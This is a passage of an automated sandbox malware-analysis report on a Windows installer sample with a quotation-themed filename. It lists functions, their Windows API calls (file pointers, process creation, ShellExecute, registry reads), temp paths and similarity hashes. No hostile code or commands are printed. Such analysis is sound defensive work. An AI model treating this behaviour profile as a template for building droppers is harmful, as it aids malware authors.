                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                                                • Instruction ID: 9d08257b753d1dc8d50a425e5d18a9377fc83dd762af72a05302a0d5f43d32a7
                                                                                • Opcode Fuzzy Hash: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                                                • Instruction Fuzzy Hash: EDA13571E00228CBDB28CFA9C8547ADBBB1FF44305F15816ED856BB281D7785A96CF44
                                                                                Function 00406AE4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                                                • Instruction ID: 4069c4fc72520be48e16bfd385b53c7c255c7f0e47fd3261c7dbfe51bff91a5a
                                                                                • Opcode Fuzzy Hash: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                                                • Instruction Fuzzy Hash: 0B913470E04228CBEF28CF99C8547ADBBB1FF44305F15816AD856BB291C378A996CF44
                                                                                Function 004067FA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                                                • Instruction ID: e16a5cd5122dbeef30614bcf2b0def54f3f28e6aa070a3c0d2e235184150711d
                                                                                • Opcode Fuzzy Hash: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                                                • Instruction Fuzzy Hash: B1814771E04228CBDF24CFA9C8447ADBBB1FF44305F25816AD856BB281C7789996CF54
                                                                                Function 004062FF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                                                • Instruction ID: 250af7da94f29308333f8738aaa2927d74ee5fc9a8e658dcecc26e0f3faccd11
                                                                                • Opcode Fuzzy Hash: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                                                • Instruction Fuzzy Hash: A7816631E04228DBDF24CFA9C8447AEBBB1FF44305F11816AD856BB281C7785A96CF54
                                                                                Function 0040674D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                                                • Instruction ID: d3a2940f28ad1956632bfd73bee9eff7b9b7c3d901c1c2bf8e917ae235022c86
                                                                                • Opcode Fuzzy Hash: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
                                                                                • Instruction Fuzzy Hash: 2D713471E00228DBDF24CFA9C8547ADBBB1FF44305F15806AD816BB281C778AA96DF54
                                                                                Function 0040686B Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                                                • Instruction ID: aa5f261e6b50ba4db5ffebf04d3efdb0ff665d1262494a5322ec58a673e68ddc
                                                                                • Opcode Fuzzy Hash: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
                                                                                • Instruction Fuzzy Hash: 91715671E00228DBDF28CF99C854BADBBB1FF44305F15806AD816BB281C778A992DF54
                                                                                Function 004067B7 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                                                • Instruction ID: ff328c296e0f6909f1720754cbeef76fe0f6b635d5236ea2459b9db161edb35a
                                                                                • Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
                                                                                • Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44
                                                                                Function 00403064 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00403078
                                                                                  • Part of subcall function 004031E3: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 004030AB
                                                                                • SetFilePointer.KERNELBASE(0039DC8A,00000000,00000000,004128D8,00004000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000), ref: 004031A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer$CountTick
                                                                                • String ID:
                                                                                • API String ID: 1092082344-0
                                                                                • Opcode ID: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
                                                                                • Instruction ID: 32da71d67e65fe5252f8ded7d9303c2dcf981c5e4867c3c67dada36b4a4d5a13
                                                                                • Opcode Fuzzy Hash: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
                                                                                • Instruction Fuzzy Hash: DD31B2B29012109FDB10BF2AFE4086A3BECE748356715823BE400B62E0C739DD52DB5E
                                                                                Function 004021D2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00406167: FindFirstFileA.KERNELBASE(75DF3410,00421580,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00405A06,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0), ref: 00406172
                                                                                  • Part of subcall function 00406167: FindClose.KERNEL32(00000000), ref: 0040617E
                                                                                • lstrlenA.KERNEL32 ref: 00402212
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040221C
                                                                                • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402244
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                • String ID:
                                                                                • API String ID: 1486964399-0
                                                                                • Opcode ID: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
                                                                                • Instruction ID: 708f0fc9269f5af075d905106071f31bae39c4f67462bfddc0a38c2d79fef8c9
                                                                                • Opcode Fuzzy Hash: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
                                                                                • Instruction Fuzzy Hash: FE112171904318AADB10EFB58945A9EB7F8AF14318F10853BA505FB2D2D6BCC9448B59
                                                                                Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                  • Part of subcall function 004055F4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                                                  • Part of subcall function 004055F4: CloseHandle.KERNEL32(?), ref: 0040562A
                                                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 3521207402-0
                                                                                • Opcode ID: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
                                                                                • Instruction ID: 8164f88ac99e46b686dec60b6f66323921365fc284b2c72d55c18730983d64c3
                                                                                • Opcode Fuzzy Hash: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
                                                                                • Instruction Fuzzy Hash: 97015731904114EBDF11AFA1C98899F7BB2EF00344F20817BF601B52E1C7789A419B9A
                                                                                Function 00405D4A Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000002,00405F8F,00000000,00000002,?,00000002,?,?,00405F8F,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405D73
                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00405F8F,?,00405F8F), ref: 00405D94
                                                                                • RegCloseKey.KERNELBASE(?), ref: 00405DB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                • Instruction ID: 75195c41eba113777763a56ee97b1b5287ad365fc5d4740e3ebf2a0583ed9f98
                                                                                • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                • Instruction Fuzzy Hash: F9015A7254020AEFDB128F64EC48EEB3FACEF18354F008036F904E6260D235D964CBA5
                                                                                Function 00401DEA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte,?), ref: 00401E30
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte, xrefs: 00401E1B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteShell
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte
                                                                                • API String ID: 587946157-3731622782
                                                                                • Opcode ID: 32c1cfe14180b42954651c6b61ca40660d18b74b52388fa16c4e3d59ffc5170c
                                                                                • Instruction ID: a7065d45e970d82f7c7c38e61fdd4921630a9aeb0a93d7a2c75a24e3c1af8d4b
                                                                                • Opcode Fuzzy Hash: 32c1cfe14180b42954651c6b61ca40660d18b74b52388fa16c4e3d59ffc5170c
                                                                                • Instruction Fuzzy Hash: 28F04672B041007FDB10ABB19D4AF5E2BA8EB60319F20493BF141F70C2DAFC88419B28
                                                                                Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000), ref: 100028A7
                                                                                • GetLastError.KERNEL32 ref: 100029AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38301650689.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 00000000.00000002.38301620249.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301679644.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38301712469.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_10000000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                                • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                                • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                                Function 00402F5C Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 00402F81
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
